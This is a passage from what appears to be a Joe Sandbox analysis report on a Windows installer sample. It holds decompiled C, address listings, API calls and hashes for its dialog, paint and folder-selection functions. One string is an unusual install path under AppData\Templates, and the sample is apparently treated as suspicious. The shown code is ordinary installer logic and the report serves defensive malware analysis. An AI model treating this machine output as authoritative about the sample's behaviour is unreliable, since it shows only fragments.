                                                            • GetDlgItem.USER32(?,00000408), ref: 00404CFD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D63
                                                            • SetWindowLongA.USER32(?,000000FC,004052EC), ref: 00404D7D
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                            • SendMessageA.USER32 ref: 00404DB9
                                                            • SendMessageA.USER32 ref: 00404DC5
                                                            • SendMessageA.USER32 ref: 00404DD5
                                                            • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                            • SendMessageA.USER32 ref: 00404E05
                                                            • SendMessageA.USER32 ref: 00404E11
                                                            • SendMessageA.USER32 ref: 00404EAB
                                                            • SendMessageA.USER32 ref: 00404EDB
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • SendMessageA.USER32 ref: 00404EEF
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404F1D
                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F2B
                                                            • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                            • SendMessageA.USER32 ref: 00405036
                                                            • SendMessageA.USER32 ref: 0040509B
                                                            • SendMessageA.USER32 ref: 004050B0
                                                            • SendMessageA.USER32 ref: 004050D4
                                                            • SendMessageA.USER32 ref: 004050F4
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405109
                                                            • GlobalFree.KERNEL32(?), ref: 00405119
                                                            • SendMessageA.USER32 ref: 00405192
                                                            • SendMessageA.USER32 ref: 0040523B
                                                            • SendMessageA.USER32 ref: 0040524A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                            • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                            • GetDlgItem.USER32(?,000003FE), ref: 004052CE
                                                            • ShowWindow.USER32(00000000), ref: 004052D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 2564846305-813528018
                                                            • Opcode ID: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction ID: 1a89480aaa14410690893e3e2f323560a6be9801fb1e0a4c64b47d85f3ee2a2e
                                                            • Opcode Fuzzy Hash: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction Fuzzy Hash: A90268B0900209EFEB149FA4CD85AAE7BB5FB45314F14817AF614BA2E1C7788E41DF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040443F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E0040443F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x43405c =  *0x43405c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040433B(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x44a3c0;
							if(_t100 - _t109 < 0x4000) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E004046E3(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x452428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x452428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x43405c != 0) {
						goto L25;
					} else {
						_t103 =  *0x438068; // 0x601114
						_t25 = _t103 + 0x14; // 0x601128
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F6(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BF();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x44e3fc - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x452458;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040440A;
				E004042D4(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F6( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404309(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x452430 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x43405c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x43405c = 0;
				return 0;
			}


















                                                            0x0040444f
                                                            0x00404574
                                                            0x004045d0
                                                            0x004045d4
                                                            0x004046a1
                                                            0x004046a3
                                                            0x004046a3
                                                            0x004046a9
                                                            0x004046a9
                                                            0x004046ac
                                                            0x00000000
                                                            0x004046b3
                                                            0x004045e2
                                                            0x004045e4
                                                            0x004045ee
                                                            0x004045f9
                                                            0x004045fc
                                                            0x004045ff
                                                            0x0040460a
                                                            0x0040460d
                                                            0x00404614
                                                            0x00404622
                                                            0x0040463a
                                                            0x0040463c
                                                            0x00404644
                                                            0x00404653
                                                            0x00404655
                                                            0x00404655
                                                            0x00404614
                                                            0x0040465f
                                                            0x00000000
                                                            0x0040466a
                                                            0x0040466e
                                                            0x0040467f
                                                            0x0040467f
                                                            0x00404685
                                                            0x00404693
                                                            0x00404693
                                                            0x00000000
                                                            0x00404697
                                                            0x0040465f
                                                            0x0040457f
                                                            0x00000000
                                                            0x00404593
                                                            0x00404593
                                                            0x00404599
                                                            0x00404599
                                                            0x0040459f
                                                            0x00000000
                                                            0x00000000
                                                            0x004045c4
                                                            0x004045c6
                                                            0x004045cb
                                                            0x00000000
                                                            0x004045cb
                                                            0x0040457f
                                                            0x00404455
                                                            0x00404458
                                                            0x0040445d
                                                            0x0040446e
                                                            0x0040446e
                                                            0x00404475
                                                            0x00404478
                                                            0x0040447a
                                                            0x0040447f
                                                            0x00404488
                                                            0x0040448e
                                                            0x0040449a
                                                            0x0040449d
                                                            0x004044a6
                                                            0x004044ab
                                                            0x004044ae
                                                            0x004044b3
                                                            0x004044ca
                                                            0x004044d1
                                                            0x004044e4
                                                            0x004044e7
                                                            0x004044fc
                                                            0x00404503
                                                            0x00404508
                                                            0x0040450d
                                                            0x0040450d
                                                            0x0040451c
                                                            0x0040452b
                                                            0x0040453d
                                                            0x00404542
                                                            0x00404552
                                                            0x00404554
                                                            0x00000000

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                            • String ID: D@$Copy failed$N
                                                            • API String ID: 3103080414-1483189110
                                                            • Opcode ID: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction ID: 2bd06c0691c76b957e6ebeae131719b0bc75d5682994f338a7987809ed17278e
                                                            • Opcode Fuzzy Hash: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction Fuzzy Hash: A661A1B1A40309BFEB109F61DC45B6A3B68EB85714F10443AFB04BB1D1D7B9A9618F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x452430;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x44e420, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x452428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                            0x0040100a
                                                            0x00401039
                                                            0x00401047
                                                            0x0040104d
                                                            0x00401051
                                                            0x0040105b
                                                            0x00401061
                                                            0x00401064
                                                            0x004010f3
                                                            0x00401089
                                                            0x0040108c
                                                            0x004010a6
                                                            0x004010bd
                                                            0x004010cc
                                                            0x004010cf
                                                            0x004010d5
                                                            0x004010d9
                                                            0x004010e4
                                                            0x004010ed
                                                            0x004010ef
                                                            0x004010ef
                                                            0x00401100
                                                            0x00401105
                                                            0x0040110d
                                                            0x00401110
                                                            0x00401112
                                                            0x00401118
                                                            0x0040111f
                                                            0x00401126
                                                            0x00401130
                                                            0x00401142
                                                            0x00401156
                                                            0x00401160
                                                            0x00401165
                                                            0x00401165
                                                            0x00401110
                                                            0x0040116e
                                                            0x00000000
                                                            0x00401178
                                                            0x00401010
                                                            0x00401013
                                                            0x00401015
                                                            0x0040101f
                                                            0x0040101f
                                                            0x00000000

                                                            APIs
                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32 ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32 ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextA.USER32(00000000,0044E420,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction ID: 0bd4ef5fed811bbf4bded0a7f85d82f2f783d311ad13c466ed52a022670cf4ac
                                                            • Opcode Fuzzy Hash: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction Fuzzy Hash: E7417C71800209AFCF058FA5DE459AFBFB9FF45315F00802AF991AA1A0C774EA55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404766 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E00404766(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x438068; // 0x601114
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xd) + 0x453000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405951(0x3fb, _t146);
					E00406535(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405951(0x3fb, _t146);
							if(E00405CD7(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406257(0x434060, _t146);
							_t87 = E00406663(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406257(0x434060, _t146);
								_t89 = E00405C82(0x434060);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x434060,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x434060) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x434060,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C30(0x434060);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x434060) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BFA(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x44e3fc + 0x10)) != _t158) {
									E00404BE2(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x434050);
									} else {
										E00404B1D(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x4524c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x43c080 == _t158) {
									E004046BF();
								}
								 *0x43c080 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x43c090;
							_v60 = E00404AB7;
							_v56 = _t146;
							_v68 = E004062EA(_t146, 0x43c090, _t166, 0x436068, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE9(_t146);
								_t125 =  *((intOrPtr*)( *0x452430 + 0x11c));
								if( *((intOrPtr*)( *0x452430 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") {
									E004062EA(_t146, 0x43c090, _t166, 0, _t125);
									if(lstrcmpiA(0x44a3c0, 0x43c090) != 0) {
										lstrcatA(_t146, 0x44a3c0);
									}
								}
								 *0x43c080 =  *0x43c080 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C56(_t146) != 0 && E00405C82(_t146) == 0) {
						E00405BE9(_t146);
					}
					 *0x44e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D4(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D4(_t166);
					E00404309(_t165);
					_t138 = E00406663(8);
					if(_t138 == 0) {
						L53:
						return E0040433B(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}













































                                                            0x00404766
                                                            0x0040476c
                                                            0x00404772
                                                            0x0040477f
                                                            0x0040478d
                                                            0x00404790
                                                            0x00404798
                                                            0x0040479e
                                                            0x0040479e
                                                            0x004047aa
                                                            0x004047ad
                                                            0x0040481b
                                                            0x00404822
                                                            0x004048f9
                                                            0x00404900
                                                            0x0040490f
                                                            0x0040490f
                                                            0x00404913
                                                            0x0040491d
                                                            0x0040492a
                                                            0x0040492c
                                                            0x0040492c
                                                            0x0040493a
                                                            0x00404941
                                                            0x00404948
                                                            0x0040494b
                                                            0x00404982
                                                            0x00404984
                                                            0x0040498a
                                                            0x0040498f
                                                            0x00404993
                                                            0x00404995
                                                            0x00404995
                                                            0x004049b1
                                                            0x00000000
                                                            0x004049b3
                                                            0x004049b6
                                                            0x004049c4
                                                            0x004049ca
                                                            0x004049cb
                                                            0x004049ce
                                                            0x004049d1
                                                            0x00000000
                                                            0x004049d1
                                                            0x0040494d
                                                            0x0040494f
                                                            0x00404953
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404955
                                                            0x00404955
                                                            0x00404962
                                                            0x00404967
                                                            0x00000000
                                                            0x00000000
                                                            0x0040496b
                                                            0x0040496d
                                                            0x0040496d
                                                            0x00404975
                                                            0x00404977
                                                            0x0040497a
                                                            0x0040497d
                                                            0x00404980
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404980
                                                            0x004049dd
                                                            0x004049e7
                                                            0x004049ea
                                                            0x004049ed
                                                            0x004049f4
                                                            0x004049f4
                                                            0x004049f6
                                                            0x004049f6
                                                            0x004049fb
                                                            0x004049fd
                                                            0x00404a05
                                                            0x00404a0c
                                                            0x00404a0e
                                                            0x00404a19
                                                            0x00404a19
                                                            0x00404a0e
                                                            0x00404a29
                                                            0x00404a33
                                                            0x00404a3b
                                                            0x00404a56
                                                            0x00404a3d
                                                            0x00404a46
                                                            0x00404a46
                                                            0x00404a3b
                                                            0x00404a5b
                                                            0x00404a60
                                                            0x00404a65
                                                            0x00404a6e
                                                            0x00404a6e
                                                            0x00404a77
                                                            0x00404a79
                                                            0x00404a79
                                                            0x00404a85
                                                            0x00404a8d
                                                            0x00404a97
                                                            0x00404a97
                                                            0x00404a9c
                                                            0x00000000
                                                            0x00404a9c
                                                            0x0040494b
                                                            0x00404902
                                                            0x00404909
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404909
                                                            0x00404828
                                                            0x00404831
                                                            0x0040484b
                                                            0x00404850
                                                            0x0040485a
                                                            0x00404861
                                                            0x0040486d
                                                            0x00404870
                                                            0x00404873
                                                            0x0040487a
                                                            0x00404882
                                                            0x00404885
                                                            0x00404889
                                                            0x00404890
                                                            0x00404898
                                                            0x004048f2
                                                            0x0040489a
                                                            0x0040489b
                                                            0x004048a2
                                                            0x004048ac
                                                            0x004048b4
                                                            0x004048c1
                                                            0x004048d5
                                                            0x004048d9
                                                            0x004048d9
                                                            0x004048d5
                                                            0x004048de
                                                            0x004048eb
                                                            0x004048eb
                                                            0x00404898
                                                            0x00000000
                                                            0x00404850
                                                            0x0040483e
                                                            0x00000000
                                                            0x00000000
                                                            0x00404844
                                                            0x00000000
                                                            0x004047af
                                                            0x004047bc
                                                            0x004047c5
                                                            0x004047d2
                                                            0x004047d2
                                                            0x004047d9
                                                            0x004047df
                                                            0x004047e8
                                                            0x004047eb
                                                            0x004047ee
                                                            0x004047f6
                                                            0x004047f9
                                                            0x004047fc
                                                            0x00404802
                                                            0x00404809
                                                            0x00404810
                                                            0x00404aa2
                                                            0x00404ab4
                                                            0x00404816
                                                            0x00404819
                                                            0x00000000
                                                            0x00404819
                                                            0x00404810

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 004047B5
